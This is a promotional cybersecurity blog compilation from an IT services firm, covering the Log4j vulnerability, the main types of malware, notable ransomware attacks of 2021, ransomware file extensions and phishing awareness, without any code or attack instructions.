On Friday, December 10, The United States Cybersecurity and Infrastructure Security Agency reported the Log4j vulnerability, as did CERT Australia. New Zealand’s NCSC supported the statements adding that the vulnerability is actively being exploited. Here’s a tweet by the United States Department of Homeland Security, just in case if you think we’re kidding.


Is cPanel plugin also vulnerable?

cPanel hosting, in simple words, is a control panel dashboard built on a Linux-based model. Website developers use it to manage the hosting environment, backups, FTP, emails, etc. cPanel web hosting allows developers to integrate the websites with a GUI (graphical user interface), similar to looking like a desktop interface. With it, you can update the version of PHP used on websites, control the firewall, and add a security certificate, among other things. BuiltWith, a leading web profiler company, estimates that there are more than three million users of cPanel, and all are at risk of Log4j shell vulnerability.

 

So what happens now?

Apache has already rushed to develop a solution. Thousands of IT teams from companies around the globe are rushing to update to the most recent Log4j version 2.15.0, which is the most effective solution as of now. While patches and updates will soon be delivered, applying them to all the systems would still be a cumbersome task. Because the web servers and computing mechanisms are not that simple now, layered with multiple code levels and customized according to needs, on an estimate, it could take months from now to get them upgraded.

It’s not the first time we have encountered a vulnerability like this, and this isn’t the last time either. So, in the long run, you are constantly exposed to these critical loopholes, especially on the popularly used tools and plugins. There are only two roads from here; you stay on the already existing vulnerable system or upgrade to a proactive service provider who takes care of it all.

 

Get secured

Technology is getting better and faster every day, which means there are enough loopholes, attacks, and inevitable vulnerabilities. At Protected Harbor, customers’ safety and security is the utmost priority, and we satisfy our customers at all cost.

“What makes us different is we expect attacks,” commented Protected Harbor CEO Richard Luna. “We assume at any point a system can be compromised and plan for it by limiting the extent of data loss.  We prepare for failure at every hardware and software level, from multiple failover firewalls and multiple redundancy resilient databases to web servers and everything in between.  We protect our clients. After all, our name is Protected Harbor.”

Protective Harbor’s proactive security is one of the most powerful shields to these attacks. The company’s remote servers and air-gapped data backup add to the level of security and functionality. Also, rapid mitigation and resolution are faster than the industry standard because our clients are not limited to a network.

While regular MSPs have used cloud backups, we use a direct 10 GB pipe to our house. These other MSPs have to wait for the restore to download the image from the cloud. That could be a very long time. Our servers and solutions are all in-house. In the case of an emergency, we can switch data between servers and immediately upload a restored image instantly.

There’s a lot more to it, Click here to check how secured you are.

What varieties of viruses and ransomware are there?

What are the different types of viruses

 

What are the different types of viruses and ransomware?

In this digital age, viruses and ransomware are becoming a growing security concern for computer users. The threat of malicious software is real, and understanding the different types of viruses and ransomware is essential to protect yourself and your data. There are four main types of viruses, each with its own characteristics and potential harm. These include Trojans, bots, malware, and ransomware. With some basic knowledge, computer users can better protect themselves against these malicious programs. Knowing the differences between these types of viruses and their capabilities is the first step to keeping your computer safe and secure.

Virus:

A computer virus is a malicious code or program written to alter how a computer operates and is designed to spread from one computer to another. A virus operates by inserting or attaching itself to a legitimate program or document that supports macros to execute its code. In the process, a virus can potentially cause unexpected or damaging effects, such as harming the system software by corrupting or destroying data.

Two types of viruses causing headaches for security experts are multipartite virus and polymorphic virus. Multipartite viruses leverage multiple attack vectors to infiltrate systems, while polymorphic viruses cunningly change their code to evade detection. Understanding and defending against these sophisticated adversaries is crucial to safeguarding our digital world.

A macro virus is a malicious code quickly gaining popularity amongst hackers. It is a type of virus that replicates itself by modifying files containing macro language, which can replicate the virus. These can be extremely dangerous as they can spread from one computer to another and can cause damage by corrupting data or programs, making them run slower or crash altogether. Users need to take preventive measures against the threat of viruses, as they can eventually cause serious damage.

Worm:

A computer worm is a type of malware that spreads copies of itself from computer to computer and even operating system. A worm can replicate itself without any human interaction and does not need to attach itself to a software program to cause damage.

Ransomware:

The idea behind ransomware, a form of malicious software, is simple: Lock and encrypt a victim’s computer or device data, then demand a ransom to restore access.

In many cases, the victim must pay the cybercriminal within a set amount of time or risk losing access forever. And since malware attacks are often deployed by cyber thieves, paying the ransom doesn’t ensure access will be restored.

Ransomware holds your personal files hostage, keeping you from your documents, photos, and financial information. Those files are still on your computer, but the malware has encrypted your device, making the data stored on your computer or mobile device inaccessible.

Who are the targets of ransomware attacks?

Ransomware can spread across the Internet without specific targets since it’s one of the most common types of computer virus. But this file-encrypting malware’s nature means that cybercriminals can also choose their targets. This targeting ability enables cybercriminals to go after those who can — and are more likely to — pay larger ransoms.

Trojan:

A Trojan horse, or Trojan, is a type of malicious code or software that looks legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or inflict some other harmful action on your data or network.

A Trojan acts like a bona fide application or file to trick you. It seeks to deceive you into loading and executing the malware on your device. Once installed, a Trojan can perform the action it was designed for.

A Trojan is sometimes called a Trojan or a Trojan horse virus, but that’s a misnomer. A Trojan cannot. A user has to execute Trojans. Even so, Trojan malware and Trojan virus are often used interchangeably.

Bots:

Bots, or Internet robots, are also known as spiders, crawlers, and web bots. While they may be utilized to perform repetitive jobs, such as indexing a search engine, they often come in the form of malware. Malware bots are used to gain total control over a computer.

Bots, or Internet robots, are also known as spiders, crawlers, and web bots. While they may be utilized to perform repetitive jobs, such as indexing a search engine, they often come in the form of malware. Malware bots are used to gain total control over a computer.

The Good

One of the typical “good” bots used is to gather information. Bots in such guises are called web crawlers. Another “good” use is automatic interaction with instant messaging, instant relay chat, or assorted other web interfaces. Dynamic interaction with websites is yet another way bots are used for positive purposes.

The Bad

Malicious bots are defined as self-propagating malware that infects its host and connects back to a central server(s). The server functions as a “command and control center” for a botnet or a network of compromised computers and similar devices. Malicious bots have the “worm-like ability to self-propagate” and can also:

  • Gather passwords
  • Obtain financial information
  • Relay spam
  • Open the back doors on the infected computer

Malware:

Malware is an abbreviated form of “malicious software.” This is software specifically designed to gain access to or damage a computer, usually without the owner’s knowledge. There are various types of malware, including spyware, ransomware, viruses, worms, Trojan horses, adware, or any malicious code that infiltrates a computer.

Each type of malware has its own purpose and potential impacts, making it important to be aware of the different types of malware. We can protect ourselves from these malicious software threats with the right knowledge and resources.

Generally, the software is considered malware based on the creator’s intent rather than its actual features. Malware creation is rising due to money that can be made through organized Internet crime. Originally malware was created for experiments and pranks, but eventually, it was used for vandalism and destruction of targeted machines. Today, much malware is created to make a profit from forced advertising (adware), stealing sensitive information (spyware), spreading email spam or child pornography (zombie computers), or extorting money (ransomware).

The best protection from malware — whether ransomware, bots, browser hijackers, or other malicious software — continues to be the usual preventive advice: be careful about what email attachments you open, be cautious when surfing by staying away from suspicious websites, and install and maintain an updated, quality antivirus program.

Spyware:

Spyware is unwanted software that infiltrates your computing device, stealing your internet usage data and sensitive information. Spyware is classified as a type of malware — malicious software designed to gain access to or damage your computer, often without your knowledge. Spyware gathers your personal information and relays it to advertisers, data firms, or external users.

Spyware is used for many purposes. Usually, it aims to track and sell your internet usage data, capture your credit card or bank account information, or steal your personal identity. How? Spyware monitors your internet activity, tracking your login and password information, and spying on your sensitive information.

Top 10 Ransomware Attacks 2021

Top 10 Ransomware Attacks 2021

 

Top 10 Ransomware Attacks

 

Ransomware Definition

Ransomware is a type of malware (malicious software) that threatens to publish or prevent access to data or a computer system, typically by encrypting it. The victim is faced with the ultimatum of either paying a ransom or risking the publication or permanent loss of their data or access to their system. The ransom demand usually involves a deadline. If the victim doesn’t pay on time, the data is permanently lost, or the ransom is increased.

Attacks using ransomware are all too frequent these days. It has affected both large firms in North America and Europe. Cybercriminals will target any customer or company, and victims come from every sector of the economy.

The FBI and other government agencies, as does the No More Ransom Project, advise against paying the ransom to prevent the ransomware cycle because it doesn’t ensure retrieval of the encrypted data. If the ransomware is not removed from the system, 50% of the victims who pay the ransom will likely experience further attacks.

 

History and Future of Ransomware

According to Becker’s Hospital Review, the first known ransomware attack occurred in 1989 and targeted the healthcare industry. 28 years later, the healthcare industry remains a top target for ransomware attacks.

The first known attack was initiated in 1989 by Joseph Popp, Ph.D., an AIDS researcher, who attacked by distributing 20,000 floppy disks to AIDS researchers spanning more than 90 countries, claiming that the disks contained a program that analyzed an individual’s risk of acquiring AIDS through the use of a questionnaire.

However, the disk also contained a malware program that initially remained dormant in computers, only activating after a computer was powered on 90 times. After the 90-start threshold was reached, the malware displayed a message demanding a payment of $189 and another $378 for a software lease. This ransomware attack became known as the AIDS Trojan or the PC Cyborg.

There will be no end to ransomware anytime soon. Ransomware as a service raas attacks have skyrocketed in 2021 and will continue to rise. About 304.7 million ransomware attacks were attempted in the first half of 2021, and many attacks went unreported as per Ransomware statistics 2021.

A recent report by Tripwire supported the fact that ransomware will keep growing, and the post-ransomware costs will keep climbing significantly. There’s no denying the fact that Ransomware is being used as a weapon, and how ransomware spreads is no longer a mystery.

Modern-day attacks target operational technology, operating system, medical and healthcare services, third-party software, and IoT devices. Fortunately, organizations don’t have to be sitting ducks; they can minimize the risk of attacks by being proactive and having a reliable ransomware data recovery infrastructure.

Top Ransomware Attacks

 

1. Kia Motors

Kia Motors America (KMA) was hit by a ransomware attack in February that hit both internal and customer-facing systems, including mobile apps, payment services, phone services, and dealership systems. The hack also impacted customers’ IT systems that were required to deliver new vehicles.

DoppelPaymer was thought to be the ransomware family that hit Kia, and the threat actors claimed to have also targeted Kia’s parent business, Hyundai Motors America. Similar system failures were also experienced by Hyundai.

On the other hand, Kia and Hyundai denied being assaulted, a frequent approach victims use to protect their reputation and customer loyalty.

2. CD Projekt Red

In February 2021, a ransomware attack hit CD Projekt Red, a video game studio located in Poland, causing significant delays in developing their highly anticipated next release, Cyberpunk 2077. The threat actors apparently stole source codes for numerous of the company’s video games, including Cyberpunk 2077, Gwent, The Witcher 3, and an unpublished version of The Witcher 3.

According to CD Projekt Red, the unlawfully obtained material is currently being distributed online. Following the incident, the company installed many security measures, including new firewalls with anti-malware protection, a new remote-access solution, and a redesign of critical IT infrastructure, according to the company.

3. Acer

Acer, a Taiwanese computer manufacturer, was hit by the REvil ransomware outbreak in March. This attack was notable because it demanded a ransom of $50,000,000, the greatest known ransom to date.

According to Advanced Intelligence, the REvil gang targeted a Microsoft Exchange server on Acer’s domain before the attack, implying that the Microsoft Exchange vulnerability was weaponized.

4. DC Police Department

The Metropolitan Police Department in Washington, D.C., was hit by ransomware from the Babuk gang, a Russian ransomware syndicate. The police department refused to pay the $4 million demanded by the group in exchange for not exposing the agency’s information and encrypted data.

Internal material, including police officer disciplinary files and intelligence reports, was massively leaked due to the attack, resulting in a 250GB data breach. Experts said it was the worst ransomware attack on a police agency in the United States.

5. Colonial Pipeline

The Colonial Pipeline ransomware assault in 2021 was likely the most high-profile of the year. The Colonial Pipeline transports roughly half of the fuel on the East Coast. The ransomware attack was the most significant hack on oil infrastructure in US history.

On May 7, the DarkSide group infected the organization’s computerized pipeline management equipment with ransomware. DarkSide’s attack vector, according to Colonial Pipeline’s CEO, was a single hacked password for an active VPN account that was no longer in use. Because Colonial Pipeline did not use multi-factor authentication, attackers could access the company’s IT network and data more quickly.

6. Brenntag

In May, Brenntag, a German chemical distribution company, was also struck by a DarkSide ransomware attack around the same time as Colonial Pipeline. According to DarkSide, the hack targeted the company’s North American business and resulted in the theft of 150 GB of critical data.

They got access by buying stolen credentials, according to DarkSide affiliates. Threat actors frequently buy stolen credentials — such as Remote Desktop credentials — on the dark web, which is why multi-factor authentication and detecting unsafe RDP connections are critical.

The first demand from DarkSide was 133.65 Bitcoin, or nearly $7.5 million, which would have been the highest payment ever made. Brenntag reduced the ransom to $4.4 million through discussions, which they paid.

7. Ireland’s Health Service Executive (HSE)

In May 2021, a variation of Conti ransomware infected Ireland’s HSE, which provides healthcare and social services. The organization shut down all of its IT systems after the incident. Many health services in Ireland were impacted, including the processing of blood tests and diagnoses.

The firm refused to pay the $20 million ransom in Bitcoin because the Conti ransomware group provided the software decryption key for free. However, the Irish health service was still subjected to months of substantial disruption as it worked to repair 2,000 IT systems that had been infected by ransomware.

8. JBS

Also, in May 2021, JBS, the world’s largest meat processing plant, was hit by a ransomware attack that forced the company to stop the operation of all its beef plants in the U.S. and slow the production of pork and poultry. The cyberattack significantly impacted the food supply chain and highlighted the manufacturing and agricultural sectors’ vulnerability to disruptions of this nature.

The FBI identified the threat actors as the REvil ransomware-as-a-service operation. According to JBS, the threat actors targeted servers supporting North American and Australian IT systems. The company ultimately paid a ransom of $11 million to the Russian-based ransomware gang to prevent further disruption.

9. Kaseya

Kaseya, an IT services company for MSP and enterprise clients, was another victim of REvil ransomware — this time during the July 4th holiday weekend. Although only 1% of Kaseya’s customers were breached, an estimated 800 to 1500 small to mid-sized businesses were affected through their MSP. One of those businesses included 800 Coop stores, a Sweden-based supermarket chain that was forced to temporarily close due to an inability to open their cash registers.

The attackers identified a chain of vulnerabilities — ranging from improper authentication validation to SQL injection — in Kaseya’s on-premises VSA software, which organizations typically run in their DMZs. REvil then used MSP’s Remote Monitoring and Management (RMM) tools to push out the attack to all connected agents.

10. Accenture

The ransomware gang LockBit hit Accenture, the global tech consultancy, with an attack in August that resulted in a leak of over 2,000 stolen files. The slow leak suggests that Accenture did not pay the $50 million ransom.

According to CyberScoop, Accenture knew about the attack on July 30 but did not confirm the breach until August 11, after a CNBC reporter tweeted about it. CRN criticized the firm for its lack of transparency about the attack, saying that the incident was a “missed opportunity by an IT heavyweight” to help spread awareness about ransomware.

 

Bonus: CNA Financial (2021)

CNA Financial, the seventh largest commercial insurer in the United States, announced on March 23, 2021, that it had “experienced a sophisticated cybersecurity attack.” Phoenix Locker ransomware was used in the attack, which was carried out by a group called Phoenix.

CNA Financial paid $40 million in May 2021 to regain access to the data. While CNA has been tight-lipped about the specifics of the negotiation and sale, it claims that all of its systems have been fully restored since then.

 

Types of ransomware:

There are two main types of ransomware:

  1. Crypto Ransomware

    Crypto ransomware encrypts files on a computer so the user cannot access them.

  2. Locker Ransomware

    Does not encrypt files. Rather, it locks the victim out of their device, preventing them from using it. Once they are locked out, cybercriminals carrying out locker ransomware attack demands a ransom to unlock the device.

Now you understand what ransomware is and the two main types of ransomware that exist. Let’s explore 10 types of ransomware attacks to help you understand how different and dangerous each type can be.

  • Locky

    Locky is a type of ransomware that was first released in a 2016 attack by an organized group of hackers. With the ability to encrypt over 160 file types, Locky spreads by tricking victims to install it via fake emails with infected attachments. This method of transmission is called phishing, a form of social engineering. Locky targets a range of file types that are often used by designers, developers, engineers, and testers.

  • WannaCry

    WannaCry is a ransomware attack that spread across 150 countries in 2017. Designed to exploit a vulnerability in Windows, it was allegedly created by the United States National Security Agency and leaked by the Shadow Brokers group. WannaCry affected 230,000 computers globally. The attack hit a third of hospital trusts in the UK, costing the NHS an estimated £92 million. Users were locked out and a ransom was demanded in the form of Bitcoin. The attack highlighted the problematic use of outdated systems, leaving the vital health service vulnerable to attack. The global financial impact of WannaCry was substantial -the cybercrime caused an estimated $4 billion in financial losses worldwide.

  • Bad Rabbit

    Bad Rabbit is a 2017 ransomware attack that spread using a method called a ‘drive-by’ attack, where insecure websites are targeted and used to carry out an attack. During a drive-by ransomware attack, a user visits a legitimate website, not knowing that they have been compromised by a hacker. Drive-by attacks often require no action from the victim, beyond browsing the compromised page. However, in this case, they are infected when they click to install something that is malware in disguise. This element is known as a malware dropper. Bad Rabbit used a fake request to install Adobe Flash as a malware dropper to spread its infection.

  • Ryuk

    Its a ransomware, which spread in August 2018, disabled the Windows System Restore option, making it impossible to restore encrypted files without a backup. Ryuk also encrypted network drives. The effects were crippling, and many organizations targeted in the US paid the demanded ransoms. August 2018 reports estimated funds raised from the attack were over $640,000.

  • Troldesh

    The Troldesh ransomware attack happened in 2015 and was spread via spam emails with infected links or attachments. Interestingly, the Troldesh attackers communicated with victims directly over email to demand ransoms. The cybercriminals even negotiated discounts for victims with who they built a rapport with — a rare occurrence indeed. This tale is the exception, not the rule. It is never a good idea to negotiate with cybercriminals. Avoid paying the demanded ransom at all costs as doing so only encourages this form of cybercrime.

  • Jigsaw

    Jigsaw is a ransomware attack that started in 2016. This attack got its name as it featured an image of the puppet from the Saw film franchise. Jigsaw gradually deleted more of the victim’s files each hour that the ransom demand was left unpaid. The use of horror movie imagery in this attack caused victims additional distress.

  • CryptoLocker

    CryptoLocker is ransomware that was first seen in 2007 and spread through infected email attachments. Once on your computer, it searched for valuable files to encrypt and hold to ransom. Thought to have affected around 500,000 computers, law enforcement, and security companies eventually managed to seize a worldwide network of hijacked home computers that were being used to spread Cryptolocker. This allowed them to control part of the criminal network and grab the data as it was being sent, without the criminals knowing. This action later led to the development of an online portal where victims could get a key to unlock and release their data for free without paying the criminals.

  • Petya

    Petya (not to be confused with ExPetr) is a ransomware attack that first hit in 2016 and resurged in 2017 as GoldenEye. Rather than encrypting specific files, this vicious ransomware encrypts the victim’s entire hard drive. It does this by encrypting the primary file table, making accessing files on the disk impossible. Petya spread through HR departments via a fake job application email with an infected Dropbox link.

  • GoldenEye

    The resurgence of Petya, known as GoldenEye, led to a global ransomware attack that happened in 2017. Dubbed WannaCry’s ‘deadly sibling,’ GoldenEye hit over 2,000 targets, including prominent oil producers in Russia and several banks. Frighteningly, GoldenEye even forced workers at the Chernobyl nuclear plant to check radiation levels manually as they had been locked out of their Windows PCs.

  • GandCrab

    GandCrab is a rather unsavory famous ransomware attack that threatened to reveal the victim’s porn-watching habits. Claiming to have a high-jacked user’s webcam, GandCrab cybercriminals demanded a ransom, or otherwise, they would make the embarrassing footage public. After having first hit in January 2018, GandCrab evolved into multiple versions. As part of the No More Ransom Initiative, internet security providers and the police collaborated to develop a ransomware decryptor to rescue victims’ sensitive data from GandCrab.

How to Spot a Ransomware Email

You now know about the various types of ransomware attacks that have been perpetrated against individuals and businesses in recent years. Many of the victims of the ransomware attacks we’ve mentioned became infected after clicking on links in spam or phishing emails or opening malicious attachments.

So, how can you avoid being a victim of a ransomware assault if you receive a ransomware email? Checking the sender is the easiest approach to recognizing a ransomware email. Is it from a reliable source? Always be cautious if you receive an email from someone or a firm you don’t recognize.

Never open email attachments from senders you don’t trust, and never click on links in emails from untrustworthy sources. If the attachment asks you to activate macros, proceed with caution. This is a popular method of ransomware distribution.

 

Using a Ransomware Decryptor

Do not pay a ransom if you are the victim of a ransomware assault. Paying the ransom demanded by cybercriminals does not guarantee that your data will be returned. After all, these are crooks. It also strengthens the ransomware industry, increasing the likelihood of future assaults. You will be able to restore the data that is being held to ransom if it is backed up outside or in cloud storage.

 

Types of Ransomware Extensions

The ransomware includes a particular file extension, you can point it out with some of the extensions defined below

.ecc, .ezz, .exx, .zzz, .xyz, .aaa, .abc, .ccc, .vvv, .xxx, .ttt, .micro, .encrypted, .locked, .crypto, _crypt, .crinf, .r5a, .XRNT, .XTBL, .crypt, .R16M01D05, .pzdc, .good, .LOL!, .OMG!, .RDM, .RRK, .encryptedRSA, .crjoker, .EnCiPhErEd, .LeChiffre, .keybtc@inbox_com, .0x0, .bleep, .1999, .vault, .HA3, .toxcrypt, .magic, .SUPERCRYPT, .CTBL, .CTB2, .locky or 6-7 length extension consisting of random characters

Go Phishing

Go Phishing

With COVID-19 changing the way many businesses are forced to work, phishing attacks have increased significantly while becoming more complex. Hackers often look at crises as opportunities and COVID-19 is no different. Attackers are using names of coworkers and companies to fool people into thinking they’re legitimate emails. With many employees working from home and logging in, there is an increased reliance on remote system tools, and phishing scams have evolved to mimic them.

Stressful times are upon us and there is no letup in sight. As a result, IT staff are finding themselves overwhelmed as they address a multitude of system issues, software problems, and new problems stemming from employees working remotely. Many employees are using personal devices, which are more vulnerable to cyber-attacks. To be truly prepared for remote work and sophisticated threats, businesses need to analyze their weaknesses and implement proper cybersecurity approaches.

At PROTECTED HARBOR, we provide custom solutions to cyber-attacks, ransomware and other debilitating infrastructure issues. Our team of IT professionals ensures your infrastructure is secure through the creation and implementation of security policies. We analyze and remediate risks to keep you safe. On average, we save our clients up to 30% on IT costs while increasing their security, productivity, durability and sustainability. We are an extension of many IT departments, freeing them up to concentrate on daily work while we do the heavy infrastructure lifting.

Contact us today to find out more, www.protectedharbor.com